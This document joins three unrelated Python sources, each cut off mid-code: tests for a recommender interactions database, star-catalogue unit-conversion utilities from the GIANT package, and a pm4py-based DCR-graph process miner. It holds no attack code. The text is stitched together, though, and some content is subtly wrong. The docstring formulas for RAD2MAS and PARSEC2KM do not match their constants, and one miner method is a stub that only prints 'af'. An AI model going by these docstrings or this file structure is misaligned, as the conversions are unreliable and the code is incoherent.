{'item': 'xbox', 'interaction': 5.0, 'rid': 3, 'user': 'jack'}
])
def test_unique_1(db_interactions):
assert check_list_equal(db_interactions.unique('interaction').values_list(), [
{'interaction': 3.0, 'rid': 0},
{'interaction': 4.0, 'rid': 1},
{'interaction': 1.0, 'rid': 2},
{'interaction': 5.0, 'rid': 3}
])
def test_unique_2(db_interactions):
assert check_list_equal(db_interactions.unique(['interaction']).values_list(), [
{'interaction': 3.0, 'rid': 0},
{'interaction': 4.0, 'rid': 1},
{'interaction': 1.0, 'rid': 2},
{'interaction': 5.0, 'rid': 3}
])
def test_unique_3(db_interactions):
assert check_list_equal(db_interactions.unique(['user']).values_list(), [
{'user': 'jack', 'rid': 0},
{'user': 'john', 'rid': 1},
{'user': 'alfred', 'rid': 2}
])
def test_unique_4(db_interactions):
assert check_list_equal(db_interactions.unique(['user', 'interaction']).values_list(), [
{'interaction': 3.0, 'user': 'jack', 'rid': 0},
{'interaction': 4.0, 'user': 'john', 'rid': 1},
{'interaction': 1.0, 'user': 'alfred', 'rid': 2},
{'interaction': 5.0, 'user': 'jack', 'rid': 3}
])
def test_unique_5(db_interactions):
try:
db_interactions.unique((['user', 'test']))
assert False
except Exception as e:
assert str(e) == 'Unexpected column "test".'
def test_unique_6(db_interactions_with_mult_cols):
assert check_list_equal(db_interactions_with_mult_cols.unique(['tags']).values_list(), [
{'tags': 'tag1;tag2', 'rid': 0},
{'tags': 'tag5', 'rid': 1},
{'tags': '', 'rid': 2},
{'tags': 'tag3', 'rid': 3}
])
def test_unique_7(db_interactions_with_mult_cols):
assert check_list_equal(db_interactions_with_mult_cols.unique('session').values_list(), [
{'session': 5, 'rid': 0},
{'session': 3, 'rid': 1},
{'session': 2, 'rid': 2},
])
def test_unique_8(db_interactions_with_iids):
assert check_list_equal(db_interactions_with_iids.unique().values_list(), [
{'item': 'ps4', 'interaction': 3.0, 'rid': 0, 'user': 'jack', 'uid': 0, 'iid': 0},
{'item': 'hard-drive', 'interaction': 4.0, 'rid': 1, 'user': 'john', 'uid': 1, 'iid': 1},
{'item': 'pen', 'interaction': 1.0, 'rid': 2, 'user': 'alfred', 'uid': 2, 'iid': 2},
{'item': 'xbox', 'interaction': 5.0, 'rid': 3, 'user': 'jack', 'uid': 0, 'iid': 3}
])
def test_unique_9(db_interactions_floats):
assert check_list_equal(db_interactions_floats.unique('interaction').values_list(), [
{'interaction': 3.0, 'rid': 0},
{'interaction': 4.2, 'rid': 1},
{'interaction': 1.1, 'rid': 2},
{'interaction': 5.5, 'rid': 3}
])
def test_unique_10(db_interactions_int_ids):
assert check_list_equal(db_interactions_int_ids.unique('user').values_list(), [
{'user': 1, 'rid': 0},
{'user': 2, 'rid': 1},
{'user': 3, 'rid': 2},
])
def test_unique_11(db_interactions_int_ids):
assert check_list_equal(db_interactions_int_ids.unique('item').values_list(), [
{'item': 1, 'rid': 0},
{'item': 2, 'rid': 1},
{'item': 3, 'rid': 2},
{'item': 4, 'rid': 3},
])
""" count_unique """
def test_count_unique_0(db_interactions):
assert db_interactions.count_unique(['user']) == 3
def test_count_unique_1(db_interactions_with_mult_cols):
assert db_interactions_with_mult_cols.count_unique('session') == 3
def test_count_unique_2(db_interactions):
try:
db_interactions.count_unique((['user', 'test']))
assert False
except Exception as e:
assert str(e) == 'Unexpected column "test".'
def test_count_unique_3(db_interactions):
assert db_interactions.count_unique(['user', 'interaction']) == 4
""" max """
def test_max_0(db_interactions):
assert db_interactions.max('interaction') == 5.0
def test_max_1(db_interactions):
assert db_interactions.max('user') == 'john'
def test_max_2(db_interactions_with_mult_cols):
assert db_interactions_with_mult_cols.max('session') == 5
def test_max_3(db_interactions):
try:
db_interactions.max((['user']))
assert False
except Exception as e:
assert str(e) == 'Unexpected column type "<class \'list\'>".'
def test_max_4(db_interactions):
try:
db_interactions.max('users')
assert False
except Exception as e:
assert str(e) == 'Unexpected column "users".'
def test_max_5(db_interactions):
try:
db_interactions.max()
assert False
except Exception as e:
assert str(e) == 'No column was given.'
def test_max_6(db_interactions_with_iids):
assert db_interactions_with_iids.max('uid') == 2
def test_max_7(db_interactions_floats):
assert db_interactions_floats.max('interaction') == 5.5
def test_max_8(db_interactions):
assert db_interactions.max('rid') == 3
""" min """
def test_min_0(db_interactions):
assert db_interactions.min('interaction') == 1.0
def test_min_1(db_interactions):
assert db_interactions.min('user') == 'alfred'
def test_min_2(db_interactions_with_mult_cols):
assert db_interactions_with_mult_cols.min('session') == 2
def test_min_3(db_interactions):
try:
db_interactions.min((['user']))
assert False
except Exception as e:
assert str(e) == 'Unexpected column type "<class \'list\'>".'
def test_min_4(db_interactions):
try:
db_interactions.min('users')
assert False
except Exception as e:
assert str(e) == 'Unexpected column "users".'
def test_min_5(db_interactions):
try:
db_interactions.min()
assert False
except Exception as e:
assert str(e) == 'No column was given.'
def test_min_6(db_interactions_with_iids):
assert db_interactions_with_iids.min('uid') == 0
def test_min_7(db_interactions_floats):
assert db_interactions_floats.min('interaction') == 1.1
def test_min_8(db_interactions):
assert db_interactions.min('rid') == 0
""" select_user_interaction_vec """
def test_select_user_interaction_vec_0(db_interactions):
try:
db_interactions.select_user_interaction_vec(0).toarray().ravel()
assert False
except Exception as e:
assert str(e) == 'Cannot retrieve user interaction vector without assigned internal ids.'
def test_select_user_interaction_vec_1(db_interactions):
db_interactions = db_interactions.select('interaction > 2.5', copy=False)
db_interactions.assign_internal_ids()
assert np.array_equal(db_interactions.select_user_interaction_vec(0).toarray().ravel(), [3.0, 0, 5.0])
assert np.array_equal(db_interactions.select_user_interaction_vec(1).toarray().ravel(), [0, 4.0, 0])
def test_select_user_interaction_vec_2(db_interactions):
new = db_interactions.select('interaction > 2.5').select('interaction < 5')
new.assign_internal_ids()
assert np.array_equal(new.select_user_interaction_vec(0).toarray().ravel(), [3.0, 0])
assert np.array_equal(new.select_user_interaction_vec(1).toarray().ravel(), [0, 4.0])
try:
new.select_user_interaction_vec(2)
assert False
except Exception as e:
assert str(e) == 'User internal id 2 was not found.'
def test_select_user_interaction_vec_3(db_interactions_with_iids):
assert np.array_equal(db_interactions_with_iids.select_user_interaction_vec(0).toarray().ravel(), [3.0, 0, 0, 5.0])
def test_select_user_interaction_vec_4(db_interactions_with_iids):
assert np.array_equal(db_interactions_with_iids.select_user_interaction_vec(1).toarray().ravel(), [0, 4.0, 0, 0])
def test_select_user_interaction_vec_5(db_interactions_with_iids):
assert np.array_equal(db_interactions_with_iids.select_user_interaction_vec(2).toarray().ravel(), [0, 0, 1.0, 0])
def test_select_user_interaction_vec_6(db_interactions_with_iids):
try:
db_interactions_with_iids.select_user_interaction_vec(3)
assert False
except Exception as e:
assert str(e) == 'User internal id 3 was not found.'
def test_select_user_interaction_vec_7(db_interactions_floats):
db_interactions_floats.assign_internal_ids()
assert np.array_equal(db_interactions_floats.select_user_interaction_vec(0).toarray().ravel(), [3.0, 0, 0, 5.5])
def test_select_user_interaction_vec_8(db_interactions_floats):
db_interactions_floats.assign_internal_ids()
assert np.array_equal(db_interactions_floats.select_user_interaction_vec(1).toarray().ravel(), [0, 4.2, 0, 0])
def test_select_user_interaction_vec_9(db_interactions_floats):
db_interactions_floats.assign_internal_ids()
assert np.array_equal(db_interactions_floats.select_user_interaction_vec(2).toarray().ravel(), [0, 0, 1.1, 0])
""" select_item_interaction_vec """
def test_select_item_interaction_vec_0(db_interactions):
try:
db_interactions.select_item_interaction_vec(0).toarray().ravel()
assert False
except Exception as e:
assert str(e) == 'Cannot retrieve user interaction vector without assigned internal ids.'
def test_select_item_interaction_vec_1(db_interactions):
db_interactions = db_interactions.select('interaction > 2.5', copy=False)
db_interactions.assign_internal_ids()
assert np.array_equal(db_interactions.select_item_interaction_vec(0).toarray().ravel(), [3.0, 0])
assert np.array_equal(db_interactions.select_item_interaction_vec(1).toarray().ravel(), [0, 4.0])
def test_select_item_interaction_vec_2(db_interactions):
new = db_interactions.select('interaction > 2.5').select('interaction < 4')
new.assign_internal_ids()
assert np.array_equal(new.select_item_interaction_vec(0).toarray().ravel(), [3.0])
try:
new.select_item_interaction_vec(1)
assert False
except Exception as e:
assert str(e) == 'Item internal id 1 was not found.'
def test_select_item_interaction_vec_3(db_interactions_with_iids):
assert np.array_equal(db_interactions_with_iids.select_item_interaction_vec(0).toarray().ravel(), [3.0, 0, 0])
def test_select_item_interaction_vec_4(db_interactions_with_iids):
assert np.array_equal(db_interactions_with_iids.select_item_interaction_vec(1).toarray().ravel(), [0, 4.0, 0])
def test_select_item_interaction_vec_5(db_interactions_with_iids):
assert np.array_equal(db_interactions_with_iids.select_item_interaction_vec(2).toarray().ravel(), [0, 0, 1.0])
def test_select_item_interaction_vec_6(db_interactions_with_iids):
assert np.array_equal(db_interactions_with_iids.select_item_interaction_vec(3).toarray().ravel(), [5.0, 0, 0])
def test_select_item_interaction_vec_7(db_interactions_with_iids):
try:
db_interactions_with_iids.select_item_interaction_vec(4)
assert False
except Exception as e:
assert str(e) == 'Item internal id 4 was not found.'
def test_select_item_interaction_vec_8(db_interactions_floats):
db_interactions_floats.assign_internal_ids()
assert np.array_equal(db_interactions_floats.select_item_interaction_vec(0).toarray().ravel(), [3.0, 0, 0])
def test_select_item_interaction_vec_9(db_interactions_floats):
db_interactions_floats.assign_internal_ids()
assert np.array_equal(db_interactions_floats.select_item_interaction_vec(1).toarray().ravel(), [0, 4.2, 0])
def test_select_item_interaction_vec_10(db_interactions_floats):
db_interactions_floats.assign_internal_ids()
assert np.array_equal(db_interactions_floats.select_item_interaction_vec(2).toarray().ravel(), [0, 0, 1.1])
def test_select_item_interaction_vec_11(db_interactions_floats):
db_interactions_floats.assign_internal_ids()
assert np.array_equal(db_interactions_floats.select_item_interaction_vec(3).toarray().ravel(), [5.5, 0, 0])
""" user_to_uid """
def test_user_to_uid_0(db_interactions_with_iids):
assert db_interactions_with_iids.user_to_uid('jack') == 0
assert db_interactions_with_iids.user_to_uid('john') == 1
assert db_interactions_with_iids.user_to_uid('alfred') == 2
def test_user_to_uid_1(db_interactions_with_iids):
assert db_interactions_with_iids.user_to_uid('bla') is None
def test_user_to_uid_2(db_interactions_with_iids):
assert db_interactions_with_iids.select('user == "alfred"').user_to_uid('alfred') == 2
def test_user_to_uid_3(db_interactions_with_iids):
assert db_interactions_with_iids.select('user == "alfred"').user_to_uid('jack') == 0
def test_user_to_uid_4(db_interactions_with_iids):
assert db_interactions_with_iids.select('rid > 2').user_to_uid('jack') == 0
def test_user_to_uid_5(db_interactions):
try:
db_interactions.user_to_uid('jack')
assert False
except Exception as e:
assert str(e) == 'No internal ids assigned yet.'
def test_user_to_uid_6(db_interactions_int_ids):
db_interactions_int_ids.assign_internal_ids()
assert db_interactions_int_ids.user_to_uid(1) == 0
assert db_interactions_int_ids.user_to_uid(2) == 1
assert db_interactions_int_ids.user_to_uid(3) == 2
def test_user_to_uid_7(db_interactions_int_ids):
    """A string lookup on an int-typed user column must raise a type error."""
    db_interactions_int_ids.assign_internal_ids()
    try:
        db_interactions_int_ids.user_to_uid('jack')
        # Fixed: the original had this sentinel duplicated; one unreachable
        # guard after the call under test is sufficient.
        assert False
    except Exception as e:
        # NOTE(review): the expected message lacks a closing ")" — it matches
        # the item_to_iid variant below, so presumably the library emits it
        # this way; confirm against the implementation.
        assert str(e) == "The provided user type does not match the inferred type (expected: int, found: <class 'str'>"
""" uid_to_user """
def test_uid_to_user_0(db_interactions_with_iids):
assert db_interactions_with_iids.uid_to_user(0) == 'jack'
assert db_interactions_with_iids.uid_to_user(1) == 'john'
assert db_interactions_with_iids.uid_to_user(2) == 'alfred'
def test_uid_to_user_1(db_interactions_with_iids):
assert db_interactions_with_iids.uid_to_user(3) is None
def test_uid_to_user_2(db_interactions_with_iids):
assert db_interactions_with_iids.select('user == "alfred"').uid_to_user(0) == 'jack'
def test_uid_to_user_3(db_interactions_with_iids):
assert db_interactions_with_iids.select('user == "alfred"').uid_to_user(1) == 'john'
def test_uid_to_user_4(db_interactions_with_iids):
assert db_interactions_with_iids.select('rid > 2').uid_to_user(1) == 'john'
def test_uid_to_user_5(db_interactions):
try:
db_interactions.uid_to_user(0)
assert False
except Exception as e:
assert str(e) == 'No internal ids assigned yet.'
def test_uid_to_user_6(db_interactions_int_ids):
db_interactions_int_ids.assign_internal_ids()
assert db_interactions_int_ids.uid_to_user(0) == 1
assert db_interactions_int_ids.uid_to_user(1) == 2
assert db_interactions_int_ids.uid_to_user(2) == 3
""" item_to_iid """
def test_item_to_iid_0(db_interactions_with_iids):
assert db_interactions_with_iids.item_to_iid('ps4') == 0
assert db_interactions_with_iids.item_to_iid('hard-drive') == 1
assert db_interactions_with_iids.item_to_iid('pen') == 2
assert db_interactions_with_iids.item_to_iid('xbox') == 3
def test_item_to_iid_1(db_interactions_with_iids):
assert db_interactions_with_iids.item_to_iid('bla') is None
def test_item_to_iid_2(db_interactions_with_iids):
assert db_interactions_with_iids.select('item == "hard-drive"').item_to_iid('hard-drive') == 1
def test_item_to_iid_3(db_interactions_with_iids):
assert db_interactions_with_iids.select('item == "hard-drive"').item_to_iid('pen') == 2
def test_item_to_iid_4(db_interactions_with_iids):
assert db_interactions_with_iids.select('rid > 2').item_to_iid('xbox') == 3
def test_item_to_iid_5(db_interactions):
try:
db_interactions.item_to_iid('ps4')
assert False
except Exception as e:
assert str(e) == 'No internal ids assigned yet.'
def test_item_to_iid_6(db_interactions_int_ids):
db_interactions_int_ids.assign_internal_ids()
assert db_interactions_int_ids.item_to_iid(1) == 0
assert db_interactions_int_ids.item_to_iid(2) == 1
assert db_interactions_int_ids.item_to_iid(3) == 2
assert db_interactions_int_ids.item_to_iid(4) == 3
def test_item_to_iid_7(db_interactions_int_ids):
db_interactions_int_ids.assign_internal_ids()
try:
db_interactions_int_ids.item_to_iid('ps4')
assert False
except Exception as e:
assert str(e) == "The provided item type does not match the inferred type (expected: int, found: <class 'str'>"
""" iid_to_item """
def test_iid_to_item_0(db_interactions_with_iids):
assert db_interactions_with_iids.iid_to_item(0) == 'ps4'
assert db_interactions_with_iids.iid_to_item(1) == 'hard-drive'
assert db_interactions_with_iids.iid_to_item(2) == 'pen'
assert db_interactions_with_iids.iid_to_item(3) == 'xbox'
def test_iid_to_item_1(db_interactions_with_iids):
assert db_interactions_with_iids.iid_to_item(4) is None
def test_iid_to_item_2(db_interactions_with_iids):
assert db_interactions_with_iids.select('iid == 0').iid_to_item(0) == 'ps4'
def test_iid_to_item_3(db_interactions_with_iids):
assert db_interactions_with_iids.select('iid == 0').iid_to_item(1) == 'hard-drive'
def test_iid_to_item_4(db_interactions_with_iids):
assert db_interactions_with_iids.select('rid > 1').iid_to_item(3) == 'xbox'
def test_iid_to_item_5(db_interactions):
try:
db_interactions.iid_to_item(0)
assert False
except Exception as e:
assert str(e) == 'No internal ids assigned yet.'
def test_iid_to_item_6(db_interactions_int_ids):
db_interactions_int_ids.assign_internal_ids()
assert db_interactions_int_ids.iid_to_item(0) == 1
assert db_interactions_int_ids.iid_to_item(1) == 2
assert db_interactions_int_ids.iid_to_item(2) == 3
assert db_interactions_int_ids.iid_to_item(3) == 4
""" drop """
def test_drop_0(db_interactions):
assert check_list_equal(db_interactions.drop([0, 2]).values_list(), [
{'item': 'hard-drive', 'interaction': 4.0, 'rid': 1, 'user': 'john'},
{'item': 'xbox', 'interaction': 5.0, 'rid': 3, 'user': 'jack'}
])
def test_drop_1(db_interactions):
assert db_interactions.drop([0, 2]).select('interaction > 4').values_list() == [
{'item': 'xbox', 'interaction': 5.0, 'rid': 3, 'user': 'jack'}
]
def test_drop_2(db_interactions):
assert db_interactions.select('interaction > 4').drop([0, 2]).values_list() == [
{'item': 'xbox', 'interaction': 5.0, 'rid': 3, 'user': 'jack'}
]
def test_drop_3(db_interactions):
assert db_interactions.select('interaction > 1', copy=False).select('interaction > 2', copy=False)\
.drop([0]).drop([3]).drop([0]).values_list() == [
{'item': 'hard-drive', 'interaction': 4.0, 'rid': 1, 'user': 'john'},
]
def test_drop_4(db_interactions_with_mult_cols):
assert db_interactions_with_mult_cols.select('interaction > 1', copy=False).select('interaction > 2', copy=False)\
.drop([0]).drop([3]).drop([0]).values_list() == [
{'item': 'hard-drive', 'interaction': 4.0, 'rid': 1, 'user': 'john', 'timestamp': 940.33, 'session': 3, 'tags': 'tag5'},
]
def test_drop_5(db_interactions):
assert check_list_equal(db_interactions.drop([0, | |
<gh_stars>1-10
# Copyright 2021 United States Government as represented by the Administrator of the National Aeronautics and Space
# Administration. No copyright is claimed in the United States under Title 17, U.S. Code. All Other Rights Reserved.
r"""
This submodule provides utility constants and functions for working with star data in GIANT.
Most of these utilities are focused on conversions of either units or of representations (i.e., a bearing to a unit
vector) with the exception of applying proper motion and computing the distance between 2 bearings. For more details on
what is contained refer to the following summary tables and the documentation for each constant/function.
"""
import datetime
from typing import Tuple, Union
import numpy as np
import pandas as pd
from giant._typing import SCALAR_OR_ARRAY, ARRAY_LIKE, Real
__all__ = ['DEG2RAD', 'RAD2DEG', 'DEG2MAS', 'MAS2DEG', 'RAD2MAS', 'MAS2RAD', 'PARSEC2KM', 'STAR_DIST',
'SI_DAYS_PER_YEAR', 'SI_SECONDS_PER_DAY', 'MJD_EPOCH', 'radec_to_unit', 'unit_to_radec',
'timedelta_to_si_years', 'datetime_to_mjd_years', 'apply_proper_motion', 'radec_distance']
"""
Things to import if someone wants to do from giant.catalogues.utilities import *
"""
# CONSTANTS.
DEG2RAD: float = np.pi / 180 # rad/deg
r"""
This constant converts from units of degrees to units of radians through multiplication.
That is ``angle_rad = angle_deg*DEG2RAD`` where ``angle_rad`` is the angle in radians and ``angle_deg`` is the angle in
degrees.
Mathematically this is :math:`\frac{\pi}{180}`.
"""
RAD2DEG: float = 180 / np.pi # deg/rad
r"""
This constant converts from units of radians to units of degrees through multiplication.
That is ``angle_deg = angle_rad*RAD2DEG`` where ``angle_rad`` is the angle in radians and ``angle_deg`` is the angle in
degrees.
Mathematically this is :math:`\frac{180}{\pi}`.
"""
DEG2MAS: float = 3600 * 1000 # mas/deg
r"""
This constant converts from units of degrees to units of milli-arc-seconds through multiplication.
That is ``angle_mas = angle_deg*DEG2MAS`` where ``angle_mas`` is the angle in milli-arc-seconds and ``angle_deg`` is the
angle in degrees.
Mathematically this is :math:`3600000`.
"""
MAS2DEG: float = 1 / DEG2MAS # deg/mas
r"""
This constant converts from units of milli-arc-seconds to units of degrees through multiplication.
That is ``angle_deg = angle_mas*MAS2DEG`` where ``angle_mas`` is the angle in milli-arc-seconds and ``angle_deg`` is the
angle in degrees.
Mathematically this is :math:`\frac{1}{3600000}`.
"""
RAD2MAS: float = RAD2DEG * DEG2MAS
r"""
This constant converts from units of radians to units of milli-arc-seconds through multiplication.
That is ``angle_mas = angle_rad*RAD2MAS`` where ``angle_mas`` is the angle in milli-arc-seconds and ``angle_rad`` is the
angle in radians.
Mathematically this is :math:`\frac{180}{3600000\pi}`.
"""
MAS2RAD: float = 1 / RAD2MAS
r"""
This constant converts from units of milli-arc-seconds to units of radians through multiplication.
That is ``angle_rad = angle_mas*MAS2RAD`` where ``angle_mas`` is the angle in milli-arc-seconds and ``angle_rad`` is the
angle in radians.
Mathematically this is :math:`\frac{3600000\pi}{180}`.
"""
PARSEC2KM: float = 30856775814913.673 # km
r"""
This constant converts from units of parsecs to units of kilometers through multiplication.
That is ``distance_km = distance_parsec*PARSEC2KM`` where ``distance_km`` is the distance in kilometers and
``distance_parsec`` is the distance in parsecs.
Mathematically this is :math:`\frac{3600000\pi}{180}`.
"""
STAR_DIST: float = 5.428047027e15 # km
"""
The average distance of stars from the UCAC4 catalogue in kilometers.
This value is used to set the distance for stars for which there is no distance information available.
"""
SI_DAYS_PER_YEAR: float = 365.25 # days
"""
This constant provides the number of SI days in a SI year.
"""
SI_SECONDS_PER_DAY: int = 86400 # seconds
"""
This constant provides the number of SI seconds in a SI day.
"""
MJD_EPOCH: datetime.datetime = datetime.datetime(1858, 11, 17) # November 17, 1858
"""
This constant provides the standard modified Julian date epoch, November 17, 1858, as a datetime
"""
# UTILITY FUNCTIONS
def radec_to_unit(ra: SCALAR_OR_ARRAY, dec: SCALAR_OR_ARRAY) -> np.ndarray:
    r"""
    Convert right ascension / declination pair(s), in radians, into unit vector(s).

    Each bearing maps to

    .. math::
        \hat{\mathbf{x}}=\left[\begin{array}{c}\text{cos}(\delta)\text{cos}(\alpha)\\
        \text{cos}(\delta)\text{sin}(\alpha)\\
        \text{sin}(\delta)\end{array}\right]

    with :math:`\alpha` the right ascension and :math:`\delta` the declination.

    The inputs follow numpy broadcasting rules, so any pair of broadcastable
    shapes is accepted; inputs with more than one dimension are raveled in C
    order.  With multiple bearings the result holds one unit vector per column.

    :param ra: The right ascension(s) to convert to unit vector(s) in units of radians
    :param dec: The declination(s) to convert to unit vector(s) in units of radians
    :return: A 3xn array of unit vectors corresponding to the right ascension, declination pair(s)
    """

    # broadcast to a common shape, then flatten so each bearing is a scalar pair
    ra_flat, dec_flat = (component.ravel() for component in np.broadcast_arrays(ra, dec))

    cos_dec = np.cos(dec_flat)

    components = [cos_dec * np.cos(ra_flat),
                  cos_dec * np.sin(ra_flat),
                  np.sin(dec_flat)]

    # squeeze collapses the single-bearing case from 3x1 down to shape (3,)
    return np.vstack(components).squeeze()
def unit_to_radec(unit: ARRAY_LIKE) -> Tuple[SCALAR_OR_ARRAY, SCALAR_OR_ARRAY]:
    r"""
    Convert unit vector(s) into right ascension / declination bearing(s).

    The declination is the angle between the xy-plane and the vector (positive
    for a positive z component) and lies in [-pi/2, pi/2].  The right ascension
    is the angle from the x axis to the projection of the vector onto the
    xy-plane, wrapped into [0, 2*pi).  They are computed as

    .. math::
        dec = \text{sin}^{-1}(z) \\
        ra = \text{tan}^{-1}\left(\frac{y}{x}\right)

    Vectors must lie along the first axis (columns for multiple vectors) and
    must be of unit length, otherwise the results are invalid.  A single input
    vector yields a tuple of two floats; multiple vectors yield two arrays.

    :param unit: The unit vector to be converted to a ra/dec bearing
    :return: The right ascension(s) and declination(s) as a tuple in units of radians
    """

    if np.shape(unit)[0] != 3:
        raise ValueError('The length of the first axis must be 3')

    declination = np.arcsin(unit[2])
    right_ascension = np.arctan2(unit[1], unit[0])

    # arctan2 returns values in (-pi, pi]; shift negatives into [0, 2*pi)
    wrap_needed = right_ascension < 0
    if np.ndim(right_ascension):
        right_ascension[wrap_needed] += 2 * np.pi
    elif wrap_needed:
        right_ascension += 2 * np.pi

    return right_ascension, declination
def timedelta_to_si_years(delta: datetime.timedelta) -> float:
    """
    Convert a python timedelta object into a fractional number of SI years.

    The total span is taken from ``timedelta.total_seconds`` and scaled through
    SI days into SI years.

    :param delta: The python timedelta object to be converted to fractional SI years
    :return: The length of time covered by the time delta in units of fractional SI years
    """

    total_days = delta.total_seconds() / SI_SECONDS_PER_DAY

    return total_days / SI_DAYS_PER_YEAR
def datetime_to_mjd_years(date: datetime.datetime) -> float:
    """
    This function converts a python datetime objects to the number of SI years since the MJD Epoch of November 17, 1858.

    This is computed by computing the time delta between the :attr:`.MJD_EPOCH` and the input datetime object, and then
    using :func:`.timedelta_to_si_years` to convert to the fractional years since the epoch.

    :param date: the python datetime object to be converted to MJD years
    :return: the number of SI years since November 17, 1858
    """
    # Dates before the epoch yield a negative result.
    return timedelta_to_si_years(date - MJD_EPOCH)
def apply_proper_motion(star_records: pd.DataFrame, new_time: Union[Real, datetime.datetime],
copy: bool = True) -> pd.DataFrame:
"""
This function adjusts the right ascension and declination of stars to a new time.
The right ascension and declination are updated using the corresponding proper motion of the stars. The formulation
used here assumes constant linear velocity as described in section 1.2.8 of "The Hipparcos and Tycho2 Catalogues".
The bearing measurement is converted to a unit vector, which is then updated using vector addition with the delta
applied along the vectors of increasing right ascension and increasing declination. This model also allows for
consideration of a radial velocity, but that is currently not implemented.
The stars input into this method should be a pandas dataframe with the GIANT format. Specifically, this function
requires the dataframe to have columns of ``['ra', 'dec', | |
from pm4py.objects.conversion.log import converter as log_converter
from pm4py.algo.filtering.log.attributes import attributes_filter
from copy import deepcopy
class Discover:
def __init__(self):
self.graph = {
'events': {},
'conditionsFor': {},
'milestonesFor': {},
'responseTo': {},
'includesTo': {},
'excludesTo': {},
'marking': {'executed': set(),
'included':set(),
'pending': set()
}
}
self.logAbstraction = {
'events': set(),
'traces': [[]],
'atMostOnce': set(),
'chainPrecedenceFor': {},
'precedenceFor': {},
'predecessor': {},
'responseTo': {},
'successor': {}
}
    def mine(self, log, graph_path, findAdditionalConditions=True):
        """
        Run the full mining pipeline: build the log abstraction, derive the DCR
        graph from it, then write the graph out.

        :param log: pm4py event log to mine
        :param graph_path: path the resulting graph is written to
        :param findAdditionalConditions: forwarded to mineFromAbstraction
        :return: 0 for success
        """
        self.createLogAbstraction(log, graph_path)
        self.mineFromAbstraction(findAdditionalConditions=findAdditionalConditions)
        # writeGraph is defined elsewhere in this class (not shown here).
        self.writeGraph(graph_path)
        return 0
    def createLogAbstraction(self, log, graph_path):
        '''
        Main mining

        Builds the per-event ordering statistics (predecessor, precedence,
        chain precedence, response, successor, at-most-once) by scanning every
        trace of the log.  Relation sets start maximal (all other events) and
        are narrowed by parseTrace; predecessor/successor start empty and grow.

        :param log: pm4py event log
        :param graph_path: where to save the log  # NOTE(review): unused here — confirm
        :return: 0 for success anything else for failure
        '''
        #event_log = log_converter.apply(log, variant=log_converter.Variants.TO_DATA_FRAME)
        #event_log = event_log.sort_values(['case:concept:name','time:timestamp','concept:name'],ascending=True)
        activities = attributes_filter.get_attribute_values(log, "concept:name")
        events = set(activities)  #event_log['concept:name'].unique())
        #arr = event_log.groupby('case:concept:name')['concept:name'].apply(lambda x: x.values).to_numpy()
        self.logAbstraction['events'] = events.copy()
        self.logAbstraction['traces'] = log
        # Every event is assumed at-most-once until a repeat is observed.
        self.logAbstraction['atMostOnce'] = events.copy()
        for event in events:
            # Start from the maximal relation (all events except self); traces
            # can only remove candidates, never add them.
            self.logAbstraction['chainPrecedenceFor'][event] = events.copy() - set([event])
            self.logAbstraction['precedenceFor'][event] = events.copy() - set([event])
            self.logAbstraction['predecessor'][event] = set()
            self.logAbstraction['responseTo'][event] = events.copy() - set([event])
            self.logAbstraction['successor'][event] = set()
        for trace in self.logAbstraction['traces']:
            self.parseTrace(trace)
        # successor is simply the inverse of the mined predecessor relation.
        for i in self.logAbstraction['predecessor']:
            for j in self.logAbstraction['predecessor'][i]:
                self.logAbstraction['successor'][j].add(i)
        return 0
    def parseTrace(self, trace):
        '''
        Narrow the log-abstraction relation sets with the evidence of one trace.

        :param trace: array each trace one row and then events in order
                      (each entry is a pm4py event dict with a 'concept:name' key)
        :return: 0 if success anything else for failure
        '''
        # Events seen so far in this trace.
        localAtLeastOnce = set()
        # For each event: the events seen strictly before it and not (yet) after.
        localSeenOnlyBefore = {}
        lastEvent = ''
        for event_dict in trace:
            event = event_dict['concept:name']
            # All events seen before this one must be predecessors
            self.logAbstraction['predecessor'][event] = self.logAbstraction['predecessor'][event].union(localAtLeastOnce)
            # If event seen before in trace, remove from atMostOnce
            if event in localAtLeastOnce:
                self.logAbstraction['atMostOnce'].discard(event)
            localAtLeastOnce.add(event)
            # Precedence for (event): All events that occured
            # before (event) are kept in the precedenceFor set
            self.logAbstraction['precedenceFor'][event] = self.logAbstraction['precedenceFor'][event].intersection(localAtLeastOnce)
            # Chain-Precedence for (event): Some event must occur
            # immediately before (event) in all traces
            if lastEvent != '':  #TODO: objects vs strings in sets
                # If first time this clause is encountered - leaves lastEvent in chain-precedence set.
                # The intersect is empty if this clause is encountered again with another lastEvent.
                self.logAbstraction['chainPrecedenceFor'][event] = self.logAbstraction['chainPrecedenceFor'][event].intersection(set([lastEvent]))
            else:
                # First event in a trace, and chainPrecedence is therefore not possible
                self.logAbstraction['chainPrecedenceFor'][event] = set()
            # To later compute responses we note which events were seen before (event) and not after
            if len(self.logAbstraction['responseTo'][event]) > 0:
                # Save all events seen before (event)
                localSeenOnlyBefore[event] = localAtLeastOnce.copy()
            # Clear (event) from all localSeenOnlyBefore, since (event) has now occured after
            for key in localSeenOnlyBefore:
                localSeenOnlyBefore[key].discard(event)
            lastEvent = event
        for event in localSeenOnlyBefore:
            # Compute set of events in trace that happened after (event)
            seenOnlyAfter = localAtLeastOnce.difference(localSeenOnlyBefore[event])
            # Delete self-relation
            seenOnlyAfter.discard(event)
            # Set of events that always happens after (event)
            self.logAbstraction['responseTo'][event] = self.logAbstraction['responseTo'][event].intersection(seenOnlyAfter)
        return 0
# Removes redundant relations based on transitive closure
def optimizeRelation(self,relation):
'''
if cond and resp A -> B, B -> C then you can remove an existing relation A -> C
:param relation:
:return:
'''
for eventA in relation:
for eventB in relation[eventA]:
relation[eventA] = relation[eventA].difference(relation[eventB])
return relation
    def optimizeRelationTransitiveReduction(self, relation):
        # NOTE(review): unfinished stub — it only prints a placeholder for each
        # relation pair and returns None; the TODO describes the intended work.
        #TODO: 1. Adj. List to Adj Matrix, 2. Transitive reduction, 3. back to Adj. List
        for eventA in relation:
            for eventB in relation[eventA]:
                print('af')
def mineFromAbstraction(self,findAdditionalConditions:bool=True):
'''
:param findAttitionalConditions:
:return: a dcr graph
'''
# Initialize graph
# Note that events become an alias, but this is irrelevant since events are never altered
self.graph['events'] = self.logAbstraction['events'].copy()
self.graph['marking']['included'] = self.logAbstraction['events'].copy()
# Initialize all mappings to avoid indexing errors
for event in self.graph['events']:
self.graph['conditionsFor'][event] = set()
self.graph['excludesTo'][event] = set()
self.graph['includesTo'][event] = set()
self.graph['responseTo'][event] = set()
self.graph['milestonesFor'][event] = set()
# Mine self-exclusions
for event in self.logAbstraction['atMostOnce']:
self.graph['excludesTo'][event].add(event)
# Mine responses from logAbstraction
